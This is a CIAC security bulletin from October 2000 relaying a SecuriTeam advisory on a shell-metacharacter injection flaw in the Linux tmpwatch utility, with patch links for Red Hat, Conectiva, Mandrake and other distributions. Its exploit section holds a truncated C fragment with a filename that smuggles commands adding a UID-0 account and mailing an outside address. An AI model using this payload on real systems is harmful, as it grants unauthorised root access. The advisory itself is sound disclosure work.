Linux 'tmpwatch' Vulnerability
Privacy and Legal Notice
CIAC INFORMATION BULLETIN
L-005: Linux 'tmpwatch' Vulnerability
October 16, 2000 16:00 GMT
PROBLEM: The tmpwatch utility has a flaw in the execution of the
system() library subroutine.
PLATFORM: Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2
DAMAGE: Through the use of arbitrary commands to the system() library
a local user account could gain root. By creating
layers of subdirectories in a subdirectory monitored by
tmpwatch, a local user could fill the system process
table. This would cause a denial of service to the system
requiring a hard reboot.
SOLUTION: Apply the patches specified in the advisory.
VULNERABILITY The risk is MEDIUM. The advisory has been publicly discussed,
ASSESSMENT: with exploit code given.
[****** Begin SecuriTeam Advisory ******]
Insecure call of external programs in tmpwatch
------------------------------------------------------------------------
SUMMARY
The tmpwatch utility is used in Red Hat Linux to remove temporary files.
This utility has an option to call the "fuser" program, which verifies if
a file is currently opened by a process. The fuser program is invoked
within tmpwatch by calling the system() library subroutine. Insecure
handling of the arguments to this subroutine could potentially allow an
attacker to execute arbitrary commands.
DETAILS
Affected Versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2
Immune Versions:
SuSE
Impact:
This vulnerability may allow local attackers to compromise superuser
access if the administrator in a non-default manner uses tmpwatch.
The tmpwatch tool removes files that have not been modified or accessed
within a specified amount of time. It was designed to securely remove
files by avoiding typical race condition vulnerabilities. System
administrators usually run this tool periodically to remove old temporary
files in world-writeable directories.
The tmpwatch tool uses the --fuser or -s options to avoid removing a file
that is in an open state in another process. This option uses the
system() library subroutine to call the external program /sbin/fuser with
the file name being examined as an argument. The system() subroutine
spawns a shell to execute the command. An attacker may create a file name
containing shell metacharacters, which could allow them to execute
arbitrary commands if tmpwatch with the fuser option is used to remove the
file.
Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch
packages suggests this vulnerability was recognized and a fix was
attempted. However, the fix is incorrect, and the vulnerability is still
exploitable.
Exploit:
1. Compile and run:
#include
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
haks0r@somehost.comRecommendations:
Do not use the --fuser or -s options with tmpwatch.
Red Hat has issued the following RPMs that contain fixes for this
vulnerability.
Red Hat Linux 6.2:
Alpha:
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
Sources:
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
Red Hat Linux 7.0:
i386:
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
Sources:
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
Conectiva:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
Trustix Secure Linux:
This file can be found at:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
Or
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
Mandrake:
You can download the updates directly from:
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates
Linux-Mandrake 6.0:
6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1:
6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0:
7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1:
7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Immunix OS 6.2:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
Or
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
ADDITIONAL INFORMATION
The information has been provided by xforce@ISS.NET X-Force,
grange@RT.MIPT.RU Alexander Y. Yurchenko,
tsl@TRUSTIX.COM TSL Team, draht@SUSE.DE Roman
Drahtmueller, security@LINUX-MANDRAKE.COM Linux Mandrake
Security Team, and greg@WIREX.COM" Greg KH.
[****** End SecuriTeam Advisory ******]
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam for the
information contained in this bulletin.
CIAC services are available to DOE, DOE Contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193 (7 x 24)
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
World Wide Web: http://www.ciac.org/
http://ciac.llnl.gov
(same machine -- either one will work)
Anonymous FTP: ftp.ciac.org
ciac.llnl.gov
(same machine -- either one will work)
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
UCRL-MI-119788
[Privacy and Legal Notice]
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
